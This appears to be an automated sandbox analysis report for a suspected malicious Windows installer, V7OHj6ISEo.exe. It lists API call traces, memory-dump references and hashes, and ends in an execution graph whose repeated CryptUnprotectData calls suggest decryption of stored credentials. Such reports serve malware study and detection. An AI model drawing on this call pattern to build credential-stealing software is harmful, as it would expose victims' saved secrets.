                                                                                                            • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                                                                            • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                                                                            • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                                                                            • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1837367574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1837347196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837415453.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837576644.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 1849352358-0
                                                                                                            • Opcode ID: f8e0c1d3071f89bffdcd2d635822fb410905a1edc8d2ce6cb8a0a09a78f20d84
                                                                                                            • Instruction ID: 8bbc6a183a468c813578a114873fb97f9d5ca0b11dae6a70aa3aa56fe52826a6
                                                                                                            • Opcode Fuzzy Hash: f8e0c1d3071f89bffdcd2d635822fb410905a1edc8d2ce6cb8a0a09a78f20d84
                                                                                                            • Instruction Fuzzy Hash: 4BF0FF72A04518AFDB01DBE4DF88CEEB7BCEB48301B14047AF641F61A0CA749D519B38
                                                                                                            APIs
                                                                                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                                                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1837367574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1837347196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837415453.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837576644.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Timeout
                                                                                                            • String ID: !
                                                                                                            • API String ID: 1777923405-2657877971
                                                                                                            • Opcode ID: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                                                                            • Instruction ID: ef61c68cd4a6cc3a6f3726d4b558d534156d03c1c75d5f5b51cfe904c604fa23
                                                                                                            • Opcode Fuzzy Hash: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                                                                            • Instruction Fuzzy Hash: A621B471948209AEEF049FA5DA4AABD7BB4EB44304F14443EF605B61D0D7B845409B18
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,00403492,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3420,004036EF,?,00000006,00000008,0000000A), ref: 00405CC3
                                                                                                            • CharPrevW.USER32(?,00000000,?,C:\Users\user~1\AppData\Local\Temp\,00403492,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3420,004036EF,?,00000006,00000008,0000000A), ref: 00405CCD
                                                                                                            • lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405CDF
                                                                                                            Strings
                                                                                                            • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405CBD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1837367574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1837347196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837415453.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837576644.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CharPrevlstrcatlstrlen
                                                                                                            • String ID: C:\Users\user~1\AppData\Local\Temp\
                                                                                                            • API String ID: 2659869361-2382934351
                                                                                                            • Opcode ID: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                                                            • Instruction ID: 595fb0ef6d3bfc82903baa2f142a0de03b6946227050b98ce465681b6cfad29b
                                                                                                            • Opcode Fuzzy Hash: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                                                            • Instruction Fuzzy Hash: AED0A771101630AAC111AB448D04CDF63ACEE45304342003BF601B70A2CB7C1D6287FD
                                                                                                            APIs
                                                                                                            • GlobalFree.KERNEL32(00552428), ref: 00401BE7
                                                                                                            • GlobalAlloc.KERNEL32(00000040,00000804), ref: 00401BF9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1837367574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1837347196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837415453.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837576644.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$AllocFree
                                                                                                            • String ID: ($U$Call
                                                                                                            • API String ID: 3394109436-1371141273
                                                                                                            • Opcode ID: f7405ea9e476423423cde41a6620a17073824cabe1c2d7eedde19d286f021b37
                                                                                                            • Instruction ID: 4b9c6e54fa6809cb214bd66434af352d7e41d31d349781cb692caa9f676c35e6
                                                                                                            • Opcode Fuzzy Hash: f7405ea9e476423423cde41a6620a17073824cabe1c2d7eedde19d286f021b37
                                                                                                            • Instruction Fuzzy Hash: 6E217B73A00200D7DB20EB94CEC995E73A4AB45314765053BF506F32D1DBB8E851DBAD
                                                                                                            APIs
                                                                                                              • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                              • Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,?,?,771B2EE0,00405B1A,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,00000000), ref: 00405D76
                                                                                                              • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
                                                                                                              • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93
                                                                                                            • lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30,?,?,771B2EE0,00405B1A,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,00000000), ref: 00405E1E
                                                                                                            • GetFileAttributesW.KERNEL32(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30,?,?,771B2EE0,00405B1A,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0), ref: 00405E2E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1837367574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1837347196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837415453.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837576644.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                            • String ID: 0_B
                                                                                                            • API String ID: 3248276644-2128305573
                                                                                                            • Opcode ID: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                                                                                            • Instruction ID: e2ef3bf648e1011fa726b67e088789f036b8871ba300d86fb9c867912b04298b
                                                                                                            • Opcode Fuzzy Hash: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                                                                                            • Instruction Fuzzy Hash: B4F0F439109E5116D62233365D09BEF0548CF82354B5A853BFC91B22D2DB3C8A539DFE
                                                                                                            APIs
                                                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059FA
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00405A07
                                                                                                            Strings
                                                                                                            • Error launching installer, xrefs: 004059E4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1837367574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1837347196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837415453.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837576644.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseCreateHandleProcess
                                                                                                            • String ID: Error launching installer
                                                                                                            • API String ID: 3712363035-66219284
                                                                                                            • Opcode ID: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                                                            • Instruction ID: 166b032e71181ba573d10d742cd21a74b10ba840f41c43b266edefbe5b435367
                                                                                                            • Opcode Fuzzy Hash: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                                                            • Instruction Fuzzy Hash: E5E04FB0A102097FEB009B64ED49F7B76ACFB04208F404531BD00F2150D774A8208A7C
                                                                                                            APIs
                                                                                                            • FreeLibrary.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,00000000,771B2EE0,00403A1A,771B3420,00403819,00000006,?,00000006,00000008,0000000A), ref: 00403A5D
                                                                                                            • GlobalFree.KERNEL32(?), ref: 00403A64
                                                                                                            Strings
                                                                                                            • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00403A55
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1837367574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1837347196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837415453.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837576644.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Free$GlobalLibrary
                                                                                                            • String ID: C:\Users\user~1\AppData\Local\Temp\
                                                                                                            • API String ID: 1100898210-2382934351
                                                                                                            • Opcode ID: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
                                                                                                            • Instruction ID: 7abb624b42f0eb5bf3103b67fd66c27476adae564a61ccebc81435f3e7eba37d
                                                                                                            • Opcode Fuzzy Hash: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
                                                                                                            • Instruction Fuzzy Hash: 73E0EC326111205BC6229F59AD44B5E776D6F58B22F0A023AE8C07B26087745D938F98
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402F9C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\V7OHj6ISEo.exe,C:\Users\user\Desktop\V7OHj6ISEo.exe,80000000,00000003), ref: 00405D0F
                                                                                                            • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F9C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\V7OHj6ISEo.exe,C:\Users\user\Desktop\V7OHj6ISEo.exe,80000000,00000003), ref: 00405D1F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1837367574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1837347196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837415453.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837576644.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CharPrevlstrlen
                                                                                                            • String ID: C:\Users\user\Desktop
                                                                                                            • API String ID: 2709904686-3976562730
                                                                                                            • Opcode ID: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                                                                            • Instruction ID: 65148869c9b5617484fe42b3676c909fd92059a2a8224d2a454660f99163d925
                                                                                                            • Opcode Fuzzy Hash: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                                                                            • Instruction Fuzzy Hash: A3D0A7B7410920EAD3126B04DC04D9F73ACEF51300B46843BE840A7171D7785CD18BEC
                                                                                                            APIs
                                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 7556116A
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 755611C7
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 755611D9
                                                                                                            • GlobalFree.KERNEL32(?), ref: 75561203
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1884142121.0000000075561000.00000020.00000001.01000000.00000004.sdmp, Offset: 75560000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1884110487.0000000075560000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1884190450.0000000075564000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1884228003.0000000075566000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_75560000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$Free$Alloc
                                                                                                            • String ID:
                                                                                                            • API String ID: 1780285237-0
                                                                                                            • Opcode ID: 8b855cfd7631457e8e1d5f74489e83604042d2230d185be50ddcfe3a1bfc7dfc
                                                                                                            • Instruction ID: 3a191dc1e5cab909a4427a1f47da8420c837f0fb9f99976006676d620804c671
                                                                                                            • Opcode Fuzzy Hash: 8b855cfd7631457e8e1d5f74489e83604042d2230d185be50ddcfe3a1bfc7dfc
                                                                                                            • Instruction Fuzzy Hash: 023181B2914281DBD701DFBAC945A3677F8FB55F60B50061BF846DB254EB34E8418BE0
                                                                                                            APIs
                                                                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                                                                            • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E6B
                                                                                                            • CharNextA.USER32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7C
                                                                                                            • lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1837367574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1837347196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837415453.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837576644.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                                                                            • String ID:
                                                                                                            • API String ID: 190613189-0
                                                                                                            • Opcode ID: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                            • Instruction ID: 3eb9f18af2c16f81f4dc7877ab3147293eaebe45f2d41041cd024b5e05e36bdf
                                                                                                            • Opcode Fuzzy Hash: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                            • Instruction Fuzzy Hash: 4AF0C831100514AFC7029B94DD4099FBBA8DF06354B25407AE844FB211D634DF01AB98

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:12.9%
                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                            Signature Coverage:2.1%
                                                                                                            Total number of Nodes:285
                                                                                                            Total number of Limit Nodes:31
                                                                                                            execution_graph 42035 38242020 SetTimer 42036 3824208c 42035->42036 42037 382420c0 42039 382420ed 42037->42039 42038 3824213c 42038->42038 42039->42038 42041 382417fc 42039->42041 42042 38241807 42041->42042 42047 382417d0 42042->42047 42044 3824229c 42051 37d195e8 42044->42051 42045 382422a5 42045->42038 42048 382417db 42047->42048 42055 3824181c 42048->42055 42050 382422f5 42050->42044 42052 37d195f3 42051->42052 42054 37d1ec47 42052->42054 42059 37d1e7f4 42052->42059 42054->42045 42056 38241827 42055->42056 42057 38242461 GetCurrentThreadId 42056->42057 42058 3824248b 42056->42058 42057->42058 42058->42050 42061 37d1e7ff 42059->42061 42060 37d1f111 42060->42054 42061->42060 42064 37d1faa1 42061->42064 42068 37d1fab0 42061->42068 42065 37d1fadb 42064->42065 42066 37d1fb8a 42065->42066 42072 382400c0 42065->42072 42069 37d1fadb 42068->42069 42070 37d1fb8a 42069->42070 42071 382400c0 2 API calls 42069->42071 42070->42070 42071->42070 42076 38240104 42072->42076 42080 38240110 42072->42080 42077 38240178 CreateWindowExW 42076->42077 42079 38240234 42077->42079 42081 38240178 CreateWindowExW 42080->42081 42083 38240234 42081->42083 42083->42083 42084 ad030 42085 ad048 42084->42085 42086 ad0a2 42085->42086 42091 382402b7 42085->42091 42096 382402c8 42085->42096 42101 38241bd0 42085->42101 42105 38241bc0 42085->42105 42092 382402ee 42091->42092 42094 38241bc0 2 API calls 42092->42094 42095 38241bd0 2 API calls 42092->42095 42093 3824030f 42093->42086 42094->42093 42095->42093 42097 382402ee 42096->42097 42099 38241bc0 2 API calls 42097->42099 42100 38241bd0 2 API calls 42097->42100 42098 3824030f 42098->42086 42099->42098 42100->42098 42102 38241bfd 42101->42102 42103 38241c2f 42102->42103 42109 38241d58 42102->42109 42103->42103 42106 38241bfd 42105->42106 42107 38241c2f 42106->42107 42108 38241d58 2 API calls 42106->42108 42108->42107 42110 38241d66 42109->42110 42111 38241d93 42109->42111 42112 38241d6e 42110->42112 42118 38241dc0 42110->42118 42111->42110 42113 38241d98 42111->42113 42112->42103 42114 382417d0 GetCurrentThreadId 42113->42114 42116 38241da4 42114->42116 42116->42103 42119 38241e02 42118->42119 42121 38241dac 42118->42121 42120 38241e5a CallWindowProcW 42119->42120 42119->42121 42120->42121 42121->42103 42122 15b158 42123 15b174 42122->42123 42131 350c0198 42123->42131 42135 350c0188 42123->42135 42124 15b1a3 42139 37d1bd48 42124->42139 42132 350c01a4 42131->42132 42149 350cc638 42132->42149 42133 350c01da 42133->42124 42136 350c0198 42135->42136 42138 350cc638 CryptUnprotectData 42136->42138 42137 350c01da 42137->42124 42138->42137 42140 37d1bd54 42139->42140 42175 37d1bd98 42140->42175 42143 38242730 42144 3824273f 42143->42144 42205 38240938 42144->42205 42151 350cc631 42149->42151 42150 350ccaf9 42150->42133 42151->42149 42151->42150 42153 350ccf01 42151->42153 42154 350ccf10 42153->42154 42158 350cd540 42154->42158 42165 350cd550 42154->42165 42155 350ccf80 42155->42151 42159 350cd575 42158->42159 42160 350cd629 42158->42160 42159->42160 42163 350cd540 CryptUnprotectData 42159->42163 42164 350cd550 CryptUnprotectData 42159->42164 42172 350cd1ec 42160->42172 42163->42160 42164->42160 42166 350cd575 42165->42166 42167 350cd629 42165->42167 42166->42167 42170 350cd540 CryptUnprotectData 42166->42170 42171 350cd550 CryptUnprotectData 42166->42171 42168 350cd1ec CryptUnprotectData 42167->42168 42169 350cd7f5 42168->42169 42169->42155 42170->42167 42171->42167 42173 350cd9e0 CryptUnprotectData 42172->42173 42174 350cd7f5 42173->42174 42174->42155 42176 37d1bdb4 42175->42176 42180 37d1ce50 42176->42180 42184 37d1ce60 42176->42184 42177 15b1aa 42177->42143 42181 37d1ce7c 42180->42181 42188 37d194b4 42181->42188 42183 37d1ce9b 42183->42177 42185 37d1ce7c 42184->42185 42186 37d194b4 2 API calls 42185->42186 42187 37d1ce9b 42186->42187 42187->42177 42189 37d194bf 42188->42189 42190 37d1cf4f 42189->42190 42193 37d1cf68 42189->42193 42197 37d1cf30 42189->42197 42190->42183 42195 37d1cf96 42193->42195 42194 37d1d021 42194->42194 42195->42194 42196 37d195e8 2 API calls 42195->42196 42196->42194 42198 37d1cf3f 42197->42198 42200 37d1cf56 42197->42200 42202 37d1cf30 2 API calls 42198->42202 42203 37d1cf4f 42198->42203 42204 37d1cf68 2 API calls 42198->42204 42199 37d1d021 42199->42199 42200->42199 42201 37d195e8 2 API calls 42200->42201 42201->42199 42202->42203 42203->42190 42204->42203 42206 38240948 42205->42206 42207 38240965 42206->42207 42213 38240980 42206->42213 42209 3824188c 42207->42209 42211 38241897 42209->42211 42212 38242866 42211->42212 42235 38241934 42211->42235 42214 382409c6 GetCurrentProcess 42213->42214 42216 38240a11 42214->42216 42217 38240a18 GetCurrentThread 42214->42217 42216->42217 42218 38240a55 GetCurrentProcess 42217->42218 42219 38240a4e 42217->42219 42220 38240a8b 42218->42220 42219->42218 42225 38240b4f 42220->42225 42229 38240f31 42220->42229 42221 38240ab3 GetCurrentThreadId 42222 38240ae4 42221->42222 42222->42207 42231 38240bc0 DuplicateHandle 42225->42231 42233 38240bc8 DuplicateHandle 42225->42233 42226 38240b8e 42226->42221 42230 38240f4e 42229->42230 42230->42221 42232 38240c5e 42231->42232 42232->42226 42234 38240c5e 42233->42234 42234->42226 42238 3824193f 42235->42238 42236 38242ed4 42236->42211 42237 38242e79 42239 38242ea9 42237->42239 42241 38242ac4 7 API calls 42237->42241 42238->42236 42238->42237 42246 38243e40 42238->42246 42239->42236 42250 38242ac4 42239->42250 42241->42239 42242 38242ec1 42256 3824d608 42242->42256 42263 3824d5f8 42242->42263 42247 38243e61 42246->42247 42248 38243e85 42247->42248 42270 38243ff0 42247->42270 42248->42237 42251 38242acf 42250->42251 42252 38240938 6 API calls 42251->42252 42255 3824d0a1 42251->42255 42253 3824d0bb 42252->42253 42386 3824c544 42253->42386 42255->42242 42262 3824d66d 42256->42262 42257 3824d899 42258 38240938 6 API calls 42257->42258 42260 3824d6ba 42258->42260 42259 3824dad0 WaitMessage 42259->42262 42260->42236 42262->42257 42262->42259 42262->42260 42393 3824c60c 42262->42393 42265 3824d66d 42263->42265 42264 3824d6ba 42264->42236 42265->42264 42266 3824d899 42265->42266 42268 3824dad0 WaitMessage 42265->42268 42269 3824c60c DispatchMessageW 42265->42269 42267 38240938 6 API calls 42266->42267 42267->42264 42268->42265 42269->42265 42274 38243ffd 42270->42274 42271 38240938 6 API calls 42273 3824402b 42271->42273 42272 38244036 42272->42248 42273->42272 42276 38242bec 42273->42276 42274->42271 42277 38242bf7 42276->42277 42278 382440a8 42277->42278 42280 38242c20 42277->42280 42281 38242c2b 42280->42281 42298 38242c30 42281->42298 42284 38244526 42336 382440f8 42284->42336 42288 38244547 42345 382491f0 42288->42345 42351 38249067 42288->42351 42359 382491d8 42288->42359 42366 38248400 42288->42366 42289 38244551 42289->42278 42301 38242c3b 42298->42301 42299 38244517 42302 38247200 42299->42302 42311 382473c8 42299->42311 42319 38246fa0 42299->42319 42330 382475cd 42299->42330 42300 38243e40 8 API calls 42300->42299 42301->42299 42301->42300 42303 38246fa0 2 API calls 42302->42303 42304 3824722f 42303->42304 42305 38244108 2 API calls 42304->42305 42306 38247382 42304->42306 42307 38247447 42304->42307 42305->42307 42306->42284 42307->42306 42374 38248060 42307->42374 42378 3824804f 42307->42378 42308 382476d3 